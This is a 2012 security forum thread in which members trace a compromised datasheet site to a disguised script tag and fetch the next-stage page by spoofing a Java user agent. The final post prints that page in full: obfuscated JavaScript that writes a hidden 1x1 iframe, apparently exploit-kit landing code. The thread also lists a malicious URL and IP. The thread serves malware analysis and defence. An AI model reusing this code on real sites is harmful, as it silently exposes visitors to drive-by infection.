Author Topic: Nice trick on datasheetz.com  (Read 8303 times)

0 Members and 1 Guest are viewing this topic.

November 26, 2012, 02:04:14 pm
Read 8303 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
A suspicious url was being blocked by web filtering software. Referrer was datasheetz.com.
I looked at the code of datasheetz.com. At a first glance there was nothing suspicious to find.



It took me some time to figure out where the suspicious url came from.
Look at the final script statement at the end of the page code.

Line

Code: [Select]
<script src="www.google-analytics.com/urchin.js" type="text/javascript"></script>
looks unsuspiciously, because it looks like a normal Google Analytics requests. But it's the key.
The url is missing the http:// statement. That means that the url is relative to the current url - actually

hxxp://datasheetz.com/www.google-analytics.com/urchin.js

There you can find the code creating the supicious url.





I don't get any content from that url. Please let me know if you get something. Url changes occasionally.

Ruining the bad guy's day

November 27, 2012, 02:31:32 pm
Reply #1

GmG

  • Special Members
  • Full Member

  • Offline
  • *

  • 92
You need to include Java in the user agent string

like

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Java/1.7.0_5


November 27, 2012, 02:49:13 pm
Reply #2

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Thanks ! That brings me one step further.

Now I stuck at an url like this one:

Code: [Select]
http://www3.x9dci2nxllju.pcanywhere.net/?n3n5lc=kqjXmamYrXCVidWlq6Wekt7p2nChZp6YrW%2FFmqBj1Jw%3D
It resolves to 188.116.34.244, but doesn't respond.
Ruining the bad guy's day

November 27, 2012, 07:20:07 pm
Reply #3

GmG

  • Special Members
  • Full Member

  • Offline
  • *

  • 92

November 27, 2012, 09:11:21 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Current url works.

Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"   >
<head><meta  content="text/html; charset=utf-8" http-equiv="Content-Type" /><meta http-equiv="Content-Language" content="en"
/>
<meta http-equiv="Cache-control" content="Public"  />  <link  href="http://www.yahoo.com/favicon.ico"></link>

<title>Smart Tools</title>
<script>function ty0mvk0t2Hu(iFoAu){iFoAu=iFoAu.replace(/~/gi,"\\").replace(/``/gi,"\"");var BlSlw="6874";var agFSNM;var guAA=[];function TKvzf(){var bZhQ='gTzU';if('RPpIXv'=='mCaJjp')sHTZo();}
var vFfUot=0;var NkMcK;for(var i=0;i<iFoAu.length;i++){if((iFoAu.length-i)>=parseInt(BlSlw.substring(vFfUot,vFfUot+1))){if('PEFQ'=='evPd')dyTI='aAhu';var pain=parseInt(BlSlw.substring(vFfUot,vFfUot+1));for(var i2=i+pain-1;i2>=i;i2--){guAA.push(iFoAu.substring(i2,i2+1));var bOVG;}
i+=parseInt(BlSlw.substring(vFfUot,vFfUot+1))-1;function HRSBJ(){}}else{var ch_i=i;guAA.push((iFoAu.substring((ch_i+1-1),(ch_i+1))));if('blkArJ'=='ySUudk')cZQgi='sKBaA';}
vFfUot++;if(vFfUot>BlSlw.length-1)vFfUot=0;if('KhCo'=='BHJBuE')jquL='XuKI';}
BRJi=window;BRJi["wW48wk9Gz5ruNyfQ0HT2VV"]=guAA.join('');if('chMi'=='cBvVw')PPLT='cMKEjG';}</script></head><body><div   id="lcAmX"
class="RWjBA&#66;" ></div><div
id="Zrq&#115;z"
qyerD="loQysd" class="UsTu"
></div>
<h2></h2>
<div
Xualiov="RFOwMGp"
id="KvDskKb"  class="ZEQxJH" ></div>
<script src="45270.js"></script>
<script>if('gDWTZ'=='cZLai')hoZTz='bGNpMu';function ZgqLdG(){}
var GchIb=document;var zaHceR;var ODbj="write";function lIaQ(){}
var VbXCqq="\x3c\x69f\x72ame  st\x79\x6c\x65=\"w\x69dt\x68:1px;he\x69ght:1px;po\x73it\x69on:\x61b\x73\x6flute\"  src=\"\x69.html\" \x3e\x3c/\x69fr\x61\x6de\x3e";var iqAKC=252;GchIb.psATl=GchIb[ODbj];if('iBYU'=='moYjY')OnFm='kInw';GchIb.psATl(VbXCqq);var OjkMuE=193;</script>
<div
id="&#102;zC&#113;"
class="mFqbp"  ></div><div  id="&#101;&#120;Row"  class="&#105;FjO" ></div><div  gUlZ="zwCmzF"  id="b&#75;x&#86;&#80;&#67;" class="c&#105;&#111;I"   ></div><div id="Za&#74;O&#120;y" class="&#82;mj&#72;"
></div></body>
<div
lRkysIQ="xhbUUqL"
id="OhtulPT"  class="fKHovrZHK" ></div>
</html>

http://urlquery.net/report.php?id=235488


Ruining the bad guy's day